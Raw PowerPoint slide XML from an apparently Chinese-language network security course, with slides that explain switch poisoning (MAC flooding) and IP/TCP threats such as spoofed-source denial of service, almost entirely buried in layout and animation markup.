                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="413700">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137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3700">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="413700">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137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53" grpId="0" animBg="1"/>
      <p:bldP spid="413754" grpId="0" animBg="1"/>
      <p:bldP spid="413758" grpId="0" animBg="1"/>
      <p:bldP spid="413759" grpId="0" animBg="1"/>
      <p:bldP spid="41376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7200" y="274638"/>
            <a:ext cx="8578850" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络接口层协议及安全威胁(Cont.) </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77827" name="Freeform 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323850" y="1341438"/>
            <a:ext cx="1799878" cy="1438275"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1296144"/>
              <a:gd name="T1" fmla="*/ 882359 h 1296144"/>
              <a:gd name="T2" fmla="*/ 299757 w 1296144"/>
              <a:gd name="T3" fmla="*/ 258436 h 1296144"/>
              <a:gd name="T4" fmla="*/ 1023442 w 1296144"/>
              <a:gd name="T5" fmla="*/ 1 h 1296144"/>
              <a:gd name="T6" fmla="*/ 1747125 w 1296144"/>
              <a:gd name="T7" fmla="*/ 258438 h 1296144"/>
              <a:gd name="T8" fmla="*/ 2046882 w 1296144"/>
              <a:gd name="T9" fmla="*/ 882364 h 1296144"/>
              <a:gd name="T10" fmla="*/ 1747123 w 1296144"/>
              <a:gd name="T11" fmla="*/ 1506287 h 1296144"/>
              <a:gd name="T12" fmla="*/ 1023441 w 1296144"/>
              <a:gd name="T13" fmla="*/ 1764726 h 1296144"/>
              <a:gd name="T14" fmla="*/ 299757 w 1296144"/>
              <a:gd name="T15" fmla="*/ 1506287 h 1296144"/>
              <a:gd name="T16" fmla="*/ 2 w 1296144"/>
              <a:gd name="T17" fmla="*/ 882364 h 1296144"/>
              <a:gd name="T18" fmla="*/ 0 w 1296144"/>
              <a:gd name="T19" fmla="*/ 882359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2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>交换机毒化攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79873" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2411412" y="1495098"/>
            <a:ext cx="66246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buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>交换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" smtClean="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>表空间有限，新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>映射会</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>替换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>旧表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>项。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>者发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>大量具有不同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>伪造源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>地址的帧</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，交换机自学习，将伪造“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>端口”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>映射填充</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>整个交换机表，而这些表项都是无效的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，使交换机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>完全退化为广播模式，攻击者达到窃听数据的目的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400">
              <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-107950" y="2924175"/>
            <a:ext cx="2481263" cy="401638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>switch poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="778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3707209"/>
            <a:ext cx="71374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9873"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(inHorizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="79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6F6C624F-CC46-4D05-8AE9-CC650D3AEFA6}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18436" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>IP、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>协议的安全威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29700" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1187450" y="2657475"/>
            <a:ext cx="3322638" cy="546100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 3322647"/>
              <a:gd name="T1" fmla="*/ 0 h 547200"/>
              <a:gd name="T2" fmla="*/ 3322564 w 3322647"/>
              <a:gd name="T3" fmla="*/ 0 h 547200"/>
              <a:gd name="T4" fmla="*/ 3322564 w 3322647"/>
              <a:gd name="T5" fmla="*/ 536299 h 547200"/>
              <a:gd name="T6" fmla="*/ 0 w 3322647"/>
              <a:gd name="T7" fmla="*/ 536299 h 547200"/>
              <a:gd name="T8" fmla="*/ 0 w 3322647"/>
              <a:gd name="T9" fmla="*/ 0 h 547200"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 3322647"/>
              <a:gd name="T16" fmla="*/ 0 h 547200"/>
              <a:gd name="T17" fmla="*/ 3322647 w 3322647"/>
              <a:gd name="T18" fmla="*/ 547200 h 547200"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="3322647" h="547200">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3322647" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3322647" y="547200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="547200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EB641B"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="EB641B"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="135128" tIns="77216" rIns="135128" bIns="77216"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900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>拒绝服务攻击</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29701" name="Freeform 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1187450" y="3203575"/>
            <a:ext cx="3322638" cy="1539875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 3322647"/>
              <a:gd name="T1" fmla="*/ 0 h 1538572"/>
              <a:gd name="T2" fmla="*/ 3322564 w 3322647"/>
              <a:gd name="T3" fmla="*/ 0 h 1538572"/>
              <a:gd name="T4" fmla="*/ 3322564 w 3322647"/>
              <a:gd name="T5" fmla="*/ 1551652 h 1538572"/>
              <a:gd name="T6" fmla="*/ 0 w 3322647"/>
              <a:gd name="T7" fmla="*/ 1551652 h 1538572"/>
              <a:gd name="T8" fmla="*/ 0 w 3322647"/>
              <a:gd name="T9" fmla="*/ 0 h 1538572"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 3322647"/>
              <a:gd name="T16" fmla="*/ 0 h 1538572"/>
              <a:gd name="T17" fmla="*/ 3322647 w 3322647"/>
              <a:gd name="T18" fmla="*/ 1538572 h 1538572"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="3322647" h="1538572">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3322647" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3322647" y="1538572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1538572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="F7D2CB"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="F7D2CB"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="101346" tIns="101346" rIns="135128" bIns="152019"/>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900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>避免被追踪而受到惩罚，构造针对同一目的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>地址的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>分组，而源 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>地址为随机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29702" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
